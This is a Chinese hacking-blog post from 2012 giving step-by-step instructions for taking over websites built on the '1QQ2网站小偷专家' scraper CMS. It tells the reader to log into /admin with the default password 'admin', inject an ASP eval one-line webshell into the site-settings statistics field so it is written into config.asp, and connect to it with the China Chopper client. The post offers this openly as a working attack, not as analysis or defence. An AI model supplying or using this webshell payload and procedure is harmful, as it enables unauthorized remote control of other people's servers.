Warning: Error while sending QUERY packet. PID=25308 in /www/wwwroot/bluenoob.com/wp-includes/wp-db.php on line 1924
1QQ2网站小偷专家 后台一句话拿shell | 诗人博客 www.BlueNoob.com | 蓝色菜鸟网

蓝盟诗人[LUC]蓝客联盟

忘记密码

1QQ2网站小偷专家 后台一句话拿shell

2012-07-23 01:56 作者: 来源: 本站 浏览: 1,382 views 我要评论 字号:

 

刚遇到个站,admin进后台,看到是1QQ2网站小偷专家

后台看看了,貌似没利用的地方,就想到和昨晚遇到的一个站差不多。

思路是这样的:插一句话到配置文件,然后举起菜刀连接这个配置文件。

官网下了个源码,看到config.asp,是在根目录的,而我们的后台是/admin/

这里要注意的是插的一句话,要把前面的%>闭合,再插一句话,再把后面的%>闭合

因此,一句话应该是%><%eval request("bluenoob")%><%

步骤:

  1. 网址后加admin,出现后台登陆界面 eg:  https://www.bluenoob.com/admin/
  2. 默认后台登陆密码 admin
  3. 在站点设置那里,随便找个地方插一句话,我是插在统计代码里的,插的代码为: %><%eval request("bluenoob")%><%
  4. 菜刀举起,连接地址为 https://www.bluenoob.com/config.asp  ,密码为 bluenoob
哦了,webshell到手。
诗人比较懒,就不截图了。
打印
分享到:
复制链接

发表评论

*

* (保密)

icon_wink.gif icon_neutral.gif icon_mad.gif icon_twisted.gif icon_smile.gif icon_eek.gif icon_sad.gif icon_rolleyes.gif icon_razz.gif icon_redface.gif icon_surprised.gif icon_mrgreen.gif icon_lol.gif icon_idea.gif icon_biggrin.gif icon_evil.gif icon_cry.gif icon_cool.gif icon_arrow.gif icon_confused.gif icon_question.gif icon_exclaim.gif

Ctrl+Enter 快捷回复

会员登录关闭

记住我 忘记密码

注册会员关闭

小提示: 您的密码会通过填写的"电子邮箱"发送给您.